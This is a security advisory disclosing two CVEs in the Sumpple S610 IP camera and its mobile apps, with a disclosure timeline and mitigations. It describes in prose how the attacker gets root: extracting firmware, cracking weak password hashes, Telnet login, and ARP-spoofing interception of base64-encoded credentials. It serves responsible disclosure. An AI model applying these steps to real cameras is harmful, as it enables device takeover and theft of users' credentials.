Vendor: Sumpple
Vendor URL: http://www.sumpple.com
Versions affected: S610 firmware 9063.SUMPPLE.7601 - 9067.SUMPPLE.7601 Sumpple IP Cam Android V1.1.33 – V1.11 IOS 1.51.5986 (Previous versions are also likely to be affected)
Systems Affected: Sumpple S610 WiFi Wireless PTZ Outdoor Security Video Network IP Camera Summple IP Cam Android and IOS mobile application.
Author: Sebastian Parker-Fitch (@scorpioitsec)
Advisory URL / CVE Identifier: CVE-2019-12085, CVE-2019-16727
Risk: High
Vendor Communication
2019-02-27: Responsible Vulnerability Disclosure process initialized
Between February 2019 and May 2019: Permanent email contact from NCC Group and Sumpple in order to follow up the process
2019:05-13: MITRE contacted and CVEs requested
2019:05-14: MITRE assigned CVE CVE-2019-12085, CVE-2019-16727
2019-05-17: Chinese CERT Team contacted
2019-09-09: Chinese CERT Team dealing with the vendor
2019-11-28: NCC Group Advisory released
Summary
It was possible to use an authenticated web or mobile application user session to access the Sumpple camera as the root user, by downloading a firmware image that contains two different hashes of the root user’s password. It was possible to crack the password hashes and access the camera as the root user by authenticating to an undocumented Telnet service.
The Sumpple IP Cam mobile application is used to remotely view and reconfigure the camera(s); all traffic between the application and camera was seen to be transmitted insecurely with base64 encoding that once decoded disclosed the username, password, user id and camera-specific password.
Location
The credentials were located in /etc/passwd and /etc/passwd~ files of the firmware image once extracted. The password was hashed using obsolete hashing algorithms descrypt and md5crypt.
Impact
Once access had been gained to the Telnet service it was possible to execute commands on the camera. This allowed the sessions of users of the web interface to be ended by executing reboot at the command line. The impact of use of Telnet on the camera means that that users on the same wired or wireless network could sniff network traffic which would contain plaintext root passwords.
The lack of encryption between the mobile clients and camera allowed for the camera credentials to be intercepted over wireless networks. It is expected this would allow malicious users to join other cameras to their accounts thus degrading the privacy of other users.
Details
Downloading the firmware image can be performed by a user logged into either the camera local web interface or mobile application. Post login, the user can check the current version of the camera in the Device Info page of the web interface.
The camera issued a GET request to the server to check if the installed firmware version was earlier than any new firmware versions available. When new firmware images were available the link could be copied and accessed as it was not password-protected which allowed anyone with knowledge of the URL to access it.
Once downloaded the firmware was trivially extracted with the Binwalk tool as the firmware was not encrypted. This provided a layout of the file system which allowed access to the passwd and passwd~ files allowing the hashes to be extracted and trivially cracked due to use of legacy and vulnerable hashing algorithms.
An NMAP scan revealed that port 23 was open and with the recovered password a user could log on to the camera as the root user.
Nmap scan report for 192.168.1.119
Host is up (0.0013s latency).
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
MAC Address: 54:CD:EE:04:F4:FE (ShenZhen Apexis Electronic)
The mobile application initial options were to register an account or login to remotely administer the camera or to add a new camera. The traffic could be intercepted by setting up a rogue wireless network and joining the camera and client devices. Once the routing was verified it was possible to conduct a man-in-the-middle attack using Ettercap and Bettercap tools to poison the ARP cache of either the camera or client devices to sniff traffic. This allowed for users to see the outbound connections from poisoned devices allowing HTTP and Telnet traffic to be intercepted.
As the traffic was transmitted over clear-text HTTP to the server it was possible to view the HTTP requests and responses. This showed that base64 encoding was used to encode the username, password and app token. The response returned had included the username, numerical userid, camera alias, model, name, device ID, unique ID, camera password and permission level.
Recommendation
Affected users should access the camera web interface and ‘network’ tab, and filter access to TCP ports 23 and 80.
When using the mobile application connect, users should do so either via a cellular connection (e.g. 3G/4G) or wireless connection VPN.
About NCC Group
NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.
Written by: Sebastian Parker-Fitch
Published date: 28/11/2019